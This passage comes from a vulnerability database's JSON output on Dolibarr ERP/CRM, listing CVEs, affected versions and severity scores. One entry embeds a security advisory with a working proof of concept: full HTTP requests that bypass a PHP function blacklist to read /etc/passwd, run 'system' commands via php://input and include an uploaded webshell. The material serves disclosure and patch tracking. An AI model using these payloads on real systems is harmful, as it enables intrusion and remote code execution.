1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8kn4-yfnc-sfaw"},{"vulnerability":"VCID-8q73-qf6x-zyde"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-ssn5-ht3p-3kgh"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.4"},{"url":"http://public2.vulnerablecode.io/api/packages/125038?format=json","purl":"pkg:composer/dolibarr/dolibarr@12.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@12.0.0"}],"aliases":["CVE-2020-12669","GHSA-rg8m-84jf-9367"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-s9rz-z4dd-rkhm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/39275?format=json","vulnerability_id":"VCID-t7pd-jyds-3ka5","summary":"Dolibarr vulnerable to remote code execution via uppercase manipulation\nDolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-30253","reference_id":"","reference_type":"","scores":[{"value":"0.89458","scoring_system":"epss","scoring_elements":"0.99564","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-30253"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/"}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-30253","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-30253"},{"reference_url":"https://www.swascan.com/blog","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.swascan.com/blog"},{"reference_url":"https://www.swascan.com/security-advisory-dolibarr-17-0-0","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.swascan.com/security-advisory-dolibarr-17-0-0"},{"reference_url":"https://www.swascan.com/blog/","reference_id":"blog","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/"}],"url":"https://www.swascan.com/blog/"},{"reference_url":"https://github.com/advisories/GHSA-9wqr-5jp4-mjmh","reference_id":"GHSA-9wqr-5jp4-mjmh","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9wqr-5jp4-mjmh"},{"reference_url":"https://www.swascan.com/security-advisory-dolibarr-17-0-0/","reference_id":"security-advisory-dolibarr-17-0-0","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/"}],"url":"https://www.swascan.com/security-advisory-dolibarr-17-0-0/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67967?format=json","purl":"pkg:composer/dolibarr/dolibarr@17.0.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1"}],"aliases":["CVE-2023-30253","GHSA-9wqr-5jp4-mjmh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t7pd-jyds-3ka5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/33691?format=json","vulnerability_id":"VCID-tcmr-1whv-tqhh","summary":"Dolibarr has Remote Code Execution Vulnerability (Bypass)\n# Summary\n\nThe Dolibarr backend provides the function of adding Menu, and supports setting permissions for the added Menu:\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164114688.png)\n\nThis is the trigger point of the vulnerability. The submitted permission can be php code, and it will be executed when viewing the created Menu:\n\n- htdocs/admin/menus/edit.php\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164445656.png)\n\nAs you can see, in edit.php, if the created menu is set to `$menu->perms`, the `dol_eval()` method will be called. Following the `dol_eval()` method, we can see that it will filter the dangerous php functions in `$menu->perms` through the blacklist set in `$forbiddenphpfunctions`:\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164725548.png)\n\nHowever, the blacklist here is not comprehensive. For example, the `include_once` and `require_once` functions can easily pass the blacklist check, which will cause file inclusion vulnerabilities. Moreover, if the `allow_url_include` option is enabled in php.ini, arbitrary code execution will occur. **The most serious thing is that we can cooperate with the file upload at `/htdocs/user/document.php?id=1&uploadform=1` to achieve more general arbitrary code execution.**\n\n# Proof of Concept\n\n## Local File Inclusion\n\n(1) First, create a Menu and set \"Permissions\" to `include_once('/etc/passwd')` (note that `''` must be used here because `\"` will be detected):\n\n```http\nPOST /htdocs/admin/menus/edit.php?action=add&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=0 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 210\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://192.168.31.31/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=all&backtopage=%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: close\n\ntoken=fae63868ce9c2a7eece04a49ffdbe23f&menu_handler=all&user=2&type=top&propertymainmenu=test1test&titre=test1test&url=test1test&langs=&position=100&target=&enabled=1&perms=include_once('/etc/passwd')&save=Save\n```\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165411557.png)\n\n(2) Then we look at the Menu we just created, and we can see that the contents of `/etc/passwd` have been successfully read out:\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165517668.png)\n\n## Remote Code Execution - 1\n\n(1) We first ensure that the `allow_url_include` option of php.ini on the server is `On`:\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228160154464.png)\n\nAt this point, we can use remote file inclusion and cooperate with `php://input` to achieve arbitrary code execution.\n\n(2) Create a Menu and set \"Permissions\" to `include_once('php://input')` (note that `''` must be used here because `\"` will be detected):\n\n```http\nPOST /htdocs/admin/menus/edit.php?action=add&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=0 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 210\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://192.168.31.31/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=all&backtopage=%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: close\n\ntoken=fae63868ce9c2a7eece04a49ffdbe23f&menu_handler=all&user=2&type=top&propertymainmenu=test1test&titre=test1test&url=test1test&langs=&position=100&target=&enabled=1&perms=include_once('php://input')&save=Save\n```\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165822802.png)\n\n(3) Finally, the system command is successfully executed through the POST request:\n\n```http\nPOST http://192.168.31.31/htdocs/admin/menus/edit.php?menu_handler=all&action=edit&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=24 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 27\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://192.168.31.31/index.php?url=/etc/passwd\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: close\n\n<?php system('ls -al /');?>\n```\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165923443.png)\n\n## Remote Code Execution - 2 (File Inclusion with file upload)\n\nAt this point, we are absolutely sure that a file inclusion vulnerability can be achieved by setting \"Permissions\", and arbitrary code execution can be achieved with `allow_url_include = On`. However, the setting `allow_url_include = On` does not exist on every server. Therefore, to achieve the purpose of universal arbitrary code execution, we need to cooperate with the file upload (without suffix) function.\n\n(1) We can upload a file containing php webshell code through the \"Attach a new file/document\" function in `/htdocs/user/document.php?id=1&uploadform=1`. The file name is \"shell\" (this file There must be no suffix, otherwise the detection of `.` by `dol_eval()` cannot be bypassed when setting \"Permissions\" later. Among all file upload points, only \"Attach a new file/document\" can be Upload files without suffix):\n\n![image-20240228232622397](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228232622397.png)\n\n(2) upload the \"shell\":\n\n![image-20240228231150328](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228231150328.png)\n\nImages uploaded from here will eventually be saved on the server in the \"/var/www/html/documents/users/1/\" directory:\n\n![image-20240228230738376](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228230738376.png)\n\n（3）create a Menu and set \"Permissions\" to `include_once('/var/www/html/documents/users/1/shell')` (note that `''` must be used here because `\"` will be detected).\n\n```http\nPOST /htdocs/admin/menus/edit.php?action=add&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=0 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 210\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://192.168.31.31/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=all&backtopage=%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: close\n\ntoken=e71337659d7cbae16b0279b4e04535aa&menu_handler=all&user=2&type=left&propertymainmenu=whaoamia&menuIdParent=123&titre=whaoamia&picto=whaoamia&url=whaoamia&langs=&position=100&enabled=1&perms=include_once('/var/www/html/documents/users/1/shell')&target=&save=Save\n```\n\n(4) Finally, when we access the Menu we just created, we can find that the \"/var/www/html/documents/users/1/shell\" file is included:\n\n![image-20240228231800914](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228231800914.png)\n\nFinally, arbitrary code execution was successfully achieved:\n\n![image-20240228231703417](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228231703417.png)\n\n![image-20240228232116013](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228232116013.png)\n\n# Impact\n\nThis vulnerability can run arbitrary commands in the file system and read sensitive files.\n\n# Say it at the end\n\nIf you confirm the vulnerability, please apply for a CVE to notify all users to update.","references":[{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/admin/menus/edit.php","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/admin/menus/edit.php"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/user/document.php","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/user/document.php"},{"reference_url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-49xw-hw94-fmv2","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-49xw-hw94-fmv2"},{"reference_url":"https://github.com/advisories/GHSA-49xw-hw94-fmv2","reference_id":"GHSA-49xw-hw94-fmv2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-49xw-hw94-fmv2"}],"fixed_packages":[],"aliases":["GHSA-49xw-hw94-fmv2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tcmr-1whv-tqhh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49888?format=json","vulnerability_id":"VCID-ty2n-5vns-abgk","summary":"SQL Injection in dolibarr\ndolibarr is vulnerable to Improper Neutralization of Special Elements used in an SQL Command.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0224","reference_id":"","reference_type":"","scores":[{"value":"0.00515","scoring_system":"epss","scoring_elements":"0.66905","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0224"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/b9b45fb50618aa8053961f50bc8604b188d0ea79","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/b9b45fb50618aa8053961f50bc8604b188d0ea79"},{"reference_url":"https://huntr.dev/bounties/f1d1ce3e-ca92-4c7b-b1b8-934e28eaa486","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/f1d1ce3e-ca92-4c7b-b1b8-934e28eaa486"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0224","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0224"},{"reference_url":"https://github.com/advisories/GHSA-j545-frh3-r9gq","reference_id":"GHSA-j545-frh3-r9gq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j545-frh3-r9gq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/36973?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0"}],"aliases":["CVE-2022-0224","GHSA-j545-frh3-r9gq"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ty2n-5vns-abgk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57038?format=json","vulnerability_id":"VCID-u1mx-ymsz-wqa2","summary":"Dolibarr ERP and CRM contain XSS Vulnerability\nDolibarr ERP/CRM is affected by stored Cross-Site Scripting (XSS) in versions through 7.0.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-18259","reference_id":"","reference_type":"","scores":[{"value":"0.00185","scoring_system":"epss","scoring_elements":"0.4001","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-18259"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-18259","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-18259"},{"reference_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-008","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-008"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/180056?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1"}],"aliases":["CVE-2017-18259","GHSA-4323-cfj5-98mh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u1mx-ymsz-wqa2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/43567?format=json","vulnerability_id":"VCID-uc33-xses-ykft","summary":"Dolibarr Cross-site Scripting vulnerability\nIn `Dolibarr ERP CRM`, WYSIWYG Editor module, v2.8.1 to v13.0.2 are affected by a stored XSS vulnerability that allows low privileged application users to store malicious scripts in the `Private Note` field at 